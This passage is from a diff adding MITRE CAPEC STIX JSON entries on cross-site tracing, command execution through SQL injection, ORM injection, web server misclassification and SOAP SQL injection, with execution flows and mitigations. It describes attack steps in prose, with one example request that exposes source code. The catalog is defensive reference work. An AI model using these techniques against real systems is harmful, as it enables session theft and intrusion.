Scripting\". 
Please refer to these CAPECs going forward.", + "external_references": [ + { + "external_id": "CAPEC-106", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/106.html" + } + ], + "id": "attack-pattern--87829d14-eece-4fa3-b36f-54cc3b2262ae", + "modified": "2017-05-01T00:00:00.000Z", + "name": "DEPRECATED: XSS through Log Files", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Cross Site Tracing (XST) enables an adversary to steal the victim's session cookie and possibly other authentication credentials transmitted in the header of the HTTP request when the victim's browser communicates to a destination system's web server.", + "external_references": [ + { + "external_id": "CAPEC-107", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/107.html" + }, + { + "external_id": "CWE-693", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html" + }, + { + "external_id": "CWE-648", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/648.html" + }, + { + "description": "Cross Site Tracing", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Cross_Site_Tracing" + }, + { + "description": "Jeremiah Grossman, Cross-Site Tracing (XST), 2003, WhiteHat Security", + "external_id": "REF-3", + "source_name": "reference_from_CAPEC", + "url": "http://www.cgisecurity.com/whitehat-mirror/WH-WhitePaper_XST_ebook.pdf" + } + ], + "id": "attack-pattern--f14acee3-770c-4154-a9b2-9eda908c6a9f", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Cross Site Tracing", + "object_marking_refs": [ + 
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--70b83583-ffe3-4e6d-b4a6-61a9b9efc346" + ], + "x_capec_child_of_refs": [ + "attack-pattern--63f43efb-7a34-4302-b3dc-8245100fdea9" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n An adversary determines that a particular system is vulnerable to reflected cross-site scripting (XSS) and endeavors to leverage this weakness to steal the victim's authentication cookie. An adversary realizes that since httpOnly attribute is set on the user's cookie, it is not possible to steal it directly with their malicious script. Instead, the adversary has their script use XMLHTTP ActiveX control in the victim's IE browser to issue an HTTP TRACE to the target system's server which has HTTP TRACE enabled. The original HTTP TRACE request contains the session cookie and so does the echoed response. The adversary picks the session cookie from the body of HTTP TRACE response and ships it to the adversary. The adversary then uses the newly acquired victim's session cookie to impersonate the victim in the target system.\n In the absence of an XSS weakness on the site with which the victim is interacting, an adversary can get the script to come from the site that they control and get it to execute in the victim's browser (if they can trick the victim's into visiting their malicious website or clicking on the link that they supplies). 
However, in that case, due to the same origin policy protection mechanism in the browser, the adversary's malicious script cannot directly issue an HTTP TRACE request to the destination system's web server because the malicious script did not originate at that domain. An adversary will then need to find a way to exploit another weakness that would enable them to circumvent the same origin policy protection.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine if HTTP Trace is enabled: Determine if HTTP Trace is enabled at the web server with which the victim has an active session

  2. Techniques
    An adversary may issue an HTTP Trace request to the target web server and observe if the response arrives with the original request in the body of the response.

Experiment

  1. Identify mechanism to launch HTTP Trace request: The adversary attempts to force the victim to issue an HTTP Trace request to the targeted application.

  2. Techniques
    The adversary probes for cross-site scripting vulnerabilities to force the victim into issuing an HTTP Trace request.

Exploit

  1. Create a malicious script that pings the web server with HTTP TRACE request: The adversary creates a malicious script that will induce the victim's browser to issue an HTTP TRACE request to the destination system's web server. The script will further intercept the response from the web server, pick up sensitive information out of it, and forward to the site controlled by the adversary.

  2. Techniques
    The adversary's malicious script circumvents the httpOnly cookie attribute that prevents from hijacking the victim's session cookie directly using document.cookie and instead leverages the HTTP TRACE to catch this information from the header of the HTTP request once it is echoed back from the web server in the body of the HTTP TRACE response.
  3. Execute malicious HTTP Trace launching script: The adversary leverages an XSS vulnerability to force the victim to execute the malicious HTTP Trace launching script

  4. Intercept HTTP TRACE response: The adversary's script intercepts the HTTP TRACE response from teh web server, glance sensitive information from it, and forward that information to a server controlled by the adversary.

", + "x_capec_extended_description": "\n The adversary uses an XSS attack to have victim's browser sent an HTTP TRACE request to a destination web server, which will proceed to return a response to the victim's web browser that contains the original HTTP request in its body. Since the HTTP header of the original HTTP TRACE request had the victim's session cookie in it, that session cookie can now be picked off the HTTP TRACE response and sent to the adversary's malicious site. XST becomes relevant when direct access to the session cookie via the \"document.cookie\" object is disabled with the use of httpOnly attribute which ensures that the cookie can be transmitted in HTTP requests but cannot be accessed in other ways. Using SSL does not protect against XST. If the system with which the victim is interacting is susceptible to XSS, an adversary can exploit that weakness directly to get their malicious script to issue an HTTP TRACE request to the destination system's web server.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "HTTP TRACE is enabled on the web server", + "The destination system is susceptible to XSS or an adversary can leverage some other weakness to bypass the same origin policy", + "Scripting is enabled in the client's browser", + "HTTP is used as the communication protocol between the server and the client" + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Medium": "Understanding of the HTTP protocol and an ability to craft a malicious script" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Administrators should disable support for HTTP TRACE at the destination's web server. 
Vendors should disable TRACE by default.", + "id": "course-of-action--16cc4cf6-75a8-41a1-bbc7-eff92929bc02", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-107-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--92929267-6931-47a1-b4dd-3fd1d012b7cf", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--16cc4cf6-75a8-41a1-bbc7-eff92929bc02", + "spec_version": "2.1", + "target_ref": "attack-pattern--f14acee3-770c-4154-a9b2-9eda908c6a9f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Patch web browser against known security origin policy bypass exploits.", + "id": "course-of-action--db00ffba-8edb-4b26-be69-98de08e8b45c", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-107-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--eb4b5528-6e2e-4670-bfd3-983606f61020", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--db00ffba-8edb-4b26-be69-98de08e8b45c", + "spec_version": "2.1", + "target_ref": "attack-pattern--f14acee3-770c-4154-a9b2-9eda908c6a9f", + "type": "relationship", + 
"x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker uses standard SQL injection methods to inject data into the command line for execution. This could be done directly through misuse of directives such as MSSQL_xp_cmdshell or indirectly through injection of data into the database that would be interpreted as shell commands. Sometime later, an unscrupulous backend application (or could be part of the functionality of the same application) fetches the injected data stored in the database and uses this data as command line arguments without performing proper validation. The malicious data escapes that data plane by spawning new commands to be executed on the host.", + "external_references": [ + { + "external_id": "CAPEC-108", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/108.html" + }, + { + "external_id": "CWE-89", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/89.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-78", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/78.html" + }, + { + "external_id": "CWE-114", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/114.html" + } + ], + "id": "attack-pattern--89acf77d-723b-43b4-b66d-6eaafed52369", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Command Line Execution through SQL Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--7c90bef7-530c-427b-8fb7-f9d3eda9c26a" + ], + 
"x_capec_child_of_refs": [ + "attack-pattern--42acc604-a86c-46f7-bd03-6e532c02d85e" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Unreliable Execution", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n SQL injection vulnerability in Cacti 0.8.6i and earlier, when register_argc_argv is enabled, allows remote attackers to execute arbitrary SQL commands via the (1) second or (2) third arguments to cmd.php. NOTE: this issue can be leveraged to execute arbitrary commands since the SQL query results are later used in the polling_items array and popen function (CVE-2006-6799).\n Reference: https://www.cve.org/CVERecord?id=CVE-2006-6799\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Probe for SQL Injection vulnerability: The attacker injects SQL syntax into user-controllable data inputs to search unfiltered execution of the SQL syntax in a query.

Exploit

  1. Achieve arbitrary command execution through SQL Injection with the MSSQL_xp_cmdshell directive: The attacker leverages a SQL Injection attack to inject shell code to be executed by leveraging the xp_cmdshell directive.

  2. Inject malicious data in the database: Leverage SQL injection to inject data in the database that could later be used to achieve command injection if ever used as a command line argument

  3. Trigger command line execution with injected arguments: The attacker causes execution of command line functionality which leverages previously injected database content as arguments.

", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The application does not properly validate data before storing in the database", + "Backend application implicitly trusts the data stored in the database", + "Malicious data is used on the backend as a command line argument" + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "High": "The attacker most likely has to be familiar with the internal functionality of the system to launch this attack. Without that knowledge, there are not many feedback mechanisms to give an attacker the indication of how to perform command injection or whether the attack is succeeding." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Disable MSSQL xp_cmdshell directive on the database", + "id": "course-of-action--d1918081-1fdb-428c-b1e3-8116e054620e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-108-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--bb697224-7fb5-464b-bb81-e9cc28732c2d", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d1918081-1fdb-428c-b1e3-8116e054620e", + "spec_version": "2.1", + "target_ref": "attack-pattern--89acf77d-723b-43b4-b66d-6eaafed52369", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + 
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Properly validate the data (syntactically and semantically) before writing it to the database.", + "id": "course-of-action--dad09427-e3ef-43e9-8424-cfb6594bedb2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-108-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--06fffa19-8a09-4715-bf01-f67ec647d4fc", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--dad09427-e3ef-43e9-8424-cfb6594bedb2", + "spec_version": "2.1", + "target_ref": "attack-pattern--89acf77d-723b-43b4-b66d-6eaafed52369", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not implicitly trust the data stored in the database. Re-validate it prior to usage to make sure that it is safe to use in a given context (e.g. 
as a command line argument).", + "id": "course-of-action--901ac737-5a15-4ef1-be33-b2e36a8c50da", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-108-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--74092c9d-86c1-49c6-82cc-08e4da29ea92", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--901ac737-5a15-4ef1-be33-b2e36a8c50da", + "spec_version": "2.1", + "target_ref": "attack-pattern--89acf77d-723b-43b4-b66d-6eaafed52369", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker leverages a weakness present in the database access layer code generated with an Object Relational Mapping (ORM) tool or a weakness in the way that a developer used a persistence framework to inject their own SQL commands to be executed against the underlying database. The attack here is similar to plain SQL injection, except that the application does not use JDBC to directly talk to the database, but instead it uses a data access layer generated by an ORM tool or framework (e.g. Hibernate). 
While most of the time code generated by an ORM tool contains safe access methods that are immune to SQL injection, sometimes either due to some weakness in the generated code or due to the fact that the developer failed to use the generated access methods properly, SQL injection is still possible.", + "external_references": [ + { + "external_id": "CAPEC-109", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/109.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-89", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/89.html" + }, + { + "external_id": "CWE-564", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/564.html" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-4", + "source_name": "reference_from_CAPEC", + "url": "http://www.owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.7-Testing_for_ORM_Injection" + } + ], + "id": "attack-pattern--f0e32d0e-9580-4b79-95e0-6e3b99bf6e45", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Object Relational Mapping Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--42acc604-a86c-46f7-bd03-6e532c02d85e" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Unreliable Execution", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized 
Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "When using Hibernate, it is possible to use the session.find() method to run queries against the database. This is an overloaded method that provides facilities to perform binding between the supplied user data and place holders in the statically defined query. However, it is also possible to use the session.find() method without using any of these query binding overloads, hence effectively concatenating the user supplied data with rest of the SQL query, resulting in a possibility for SQL injection. While the framework may provide mechanisms to use methods immune to SQL injections, it may also contain ways that are not immune that may be chosen by the developer." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine Persistence Framework Used: An attacker tries to determine what persistence framework is used by the application in order to leverage a weakness in the generated data access layer code or a weakness in a way that the data access layer may have been used by the developer.

  2. Techniques
    An attacker provides input to the application in an attempt to induce an error screen that reveals a stack trace that gives an indication of the automated data access layer used. Or an attacker may simply make some educated guesses and assume, for instance, that Hibernate is used and try to craft an attack from there.
  3. Probe for ORM Injection vulnerabilities: The attacker injects ORM syntax into user-controllable data inputs of the application to determine if it is possible modify data query structure and content.

Exploit

  1. Perform SQL Injection through the generated data access layer: An attacker proceeds to exploit a weakness in the generated data access methods that does not properly separate control plane from the data plan, or potentially a particular way in which developer might have misused the generated code, to modify the structure of the executed SQL queries and/or inject entirely new SQL queries.

  2. Techniques
    An attacker uses normal SQL injection techniques and adjusts them to reflect the type of data access layer generation framework used by the application.
", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "An application uses data access layer generated by an ORM tool or framework", + "An application uses user supplied data in queries executed against the database", + "The separation between data plane and control plane is not ensured, through either developer error or an underlying weakness in the data access layer code generation framework" + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Medium": "Knowledge of general SQL injection techniques and subtleties of the ORM framework is needed" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Remember to understand how to use the data access methods generated by the ORM tool / framework properly in a way that would leverage the built-in security mechanisms of the framework", + "id": "course-of-action--fc27d692-9337-4434-bf26-3b58ffd7ab42", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-109-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--44a7c013-8531-4a05-b8fc-d49a59a09123", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fc27d692-9337-4434-bf26-3b58ffd7ab42", + "spec_version": "2.1", + "target_ref": "attack-pattern--f0e32d0e-9580-4b79-95e0-6e3b99bf6e45", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + 
"created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure to keep up to date with security relevant updates to the persistence framework used within your application.", + "id": "course-of-action--d19890d1-f3ad-4940-851c-62729cd33bf5", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-109-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d021b9f3-7bd8-4d7c-8e30-933d2cff35f6", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d19890d1-f3ad-4940-851c-62729cd33bf5", + "spec_version": "2.1", + "target_ref": "attack-pattern--f0e32d0e-9580-4b79-95e0-6e3b99bf6e45", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attack of this type exploits a Web server's decision to take action based on filename or file extension. Because different file types are handled by different server processes, misclassification may force the Web server to take unexpected action, or expected actions in an unexpected sequence. 
This may cause the server to exhaust resources, supply debug or system data to the attacker, or bind an attacker to a remote process.", + "external_references": [ + { + "external_id": "CAPEC-11", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/11.html" + }, + { + "external_id": "CWE-430", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/430.html" + }, + { + "description": "Masquerading: Space after Filename", + "external_id": "T1036.006", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1036/006" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Orion Application Server JSP Source Disclosure Vulnerability (Bugtraq ID: 17204), SecurityFocus", + "external_id": "REF-6", + "source_name": "reference_from_CAPEC", + "url": "http://www.securityfocus.com/bid/17204/info" + } + ], + "id": "attack-pattern--74a4fb36-83cb-4851-b09c-370f1a408523", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Cause Web Server Misclassification", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--95afb65f-ece7-4511-85a3-d7bfb9973022" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n J2EE application servers are supposed to execute Java Server Pages (JSP). There have been disclosure issues relating to Orion Application Server, where an attacker that appends either a period (.) 
or space characters to the end of a legitimate Http request, then the server displays the full source code in the attackers' web browser.\n http://victim.site/login.jsp.\n Since remote data and directory access may be accessed directly from the JSP, this is a potentially very serious issue.\n [REF-6]\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Footprint file input vectors: Manually or using an automated tool, an attacker searches for all input locations where a user has control over the filenames or MIME types of files submitted to the web server.

  2. Techniques
    Attacker manually crawls application to identify file inputs
    Attacker uses an automated tool to crawl application identify file inputs
    Attacker manually assesses strength of access control protecting native application files from user control
    Attacker explores potential for submitting files directly to the web server via independently constructed HTTP Requests

Experiment

  1. File misclassification shotgunning: An attacker makes changes to file extensions and MIME types typically processed by web servers and looks for abnormal behavior.

  2. Techniques
    Attacker submits files with switched extensions (e.g. .php on a .jsp file) to web server.
    Attacker adds extra characters (e.g. adding an extra . after the file extension) to filenames of files submitted to web server.
  3. File misclassification sniping: Understanding how certain file types are processed by web servers, an attacker crafts varying file payloads and modifies their file extension or MIME type to be that of the targeted type to see if the web server is vulnerable to misclassification of that type.

  4. Techniques
    Craft a malicious file payload, modify file extension to the targeted file type and submit it to the web server.
    Craft a malicious file payload, modify its associated MIME type to the targeted file type and submit it to the web server.

Exploit

  1. Disclose information: The attacker, by manipulating a file extension or MIME type is able to make the web server return raw information (not executed).

  2. Techniques
    Manipulate the file names that are explicitly sent to the server.
    Manipulate the MIME sent in order to confuse the web server.
", + "x_capec_extended_description": "\n This type of vulnerability has been found in many widely used servers including IIS, Lotus Domino, and Orion. The attacker's job in this case is straightforward, standard communication protocols and methods are used and are generally appended with malicious information at the tail end of an otherwise legitimate request. The attack payload varies, but it could be special characters like a period or simply appending a tag that has a special meaning for operations on the server side like .jsp for a java application server. The essence of this attack is that the attacker deceives the server into executing functionality based on the name of the request, i.e. login.jsp, not the contents.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Web server software must rely on file name or file extension for processing.", + "The attacker must be able to make HTTP requests to the web server." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." 
+ ], + "x_capec_skills_required": { + "Low": "To modify file name or file extension", + "Medium": "To use misclassification to force the Web server to disclose configuration information, source, or binary data" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Server routines should be determined by content not determined by filename or file extension.", + "id": "course-of-action--a2f0dd07-332e-41f6-951c-fa0994e302de", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-11-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--22b26b12-1eff-40ab-95ab-8de26f22b487", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a2f0dd07-332e-41f6-951c-fa0994e302de", + "spec_version": "2.1", + "target_ref": "attack-pattern--74a4fb36-83cb-4851-b09c-370f1a408523", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker modifies the parameters of the SOAP message that is sent from the service consumer to the service provider to initiate a SQL injection attack. On the service provider side, the SOAP message is parsed and parameters are not properly validated before being used to access a database in a way that does not use parameter binding, thus enabling the attacker to control the structure of the executed SQL query. 
This pattern describes a SQL injection attack with the delivery mechanism being a SOAP message.", + "external_references": [ + { + "external_id": "CAPEC-110", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/110.html" + }, + { + "external_id": "CWE-89", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/89.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + } + ], + "id": "attack-pattern--7c90bef7-530c-427b-8fb7-f9d3eda9c26a", + "modified": "2021-06-24T00:00:00.000Z", + "name": "SQL Injection through SOAP Parameter Tampering", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--8e3a14fd-870a-4286-866d-805107c7d922" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--89acf77d-723b-43b4-b66d-6eaafed52369" + ], + "x_capec_child_of_refs": [ + "attack-pattern--42acc604-a86c-46f7-bd03-6e532c02d85e" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Unreliable Execution", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "An attacker uses a travel booking system that leverages SOAP communication between the client and the travel booking service. An attacker begins to tamper with the outgoing SOAP messages by modifying their parameters to include characters that would break a dynamically constructed SQL query. 
They notice that the system fails to respond when these malicious inputs are injected in certain parameters transferred in a SOAP message. The attacker crafts a SQL query that modifies their payment amount in the travel system's database and passes it as one of the parameters . A backend batch payment system later fetches the payment amount from the database (the modified payment amount) and sends to the credit card processor, enabling the attacker to purchase the airfare at a lower price. An attacker needs to have some knowledge of the system's database, perhaps by exploiting another weakness that results in information disclosure." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

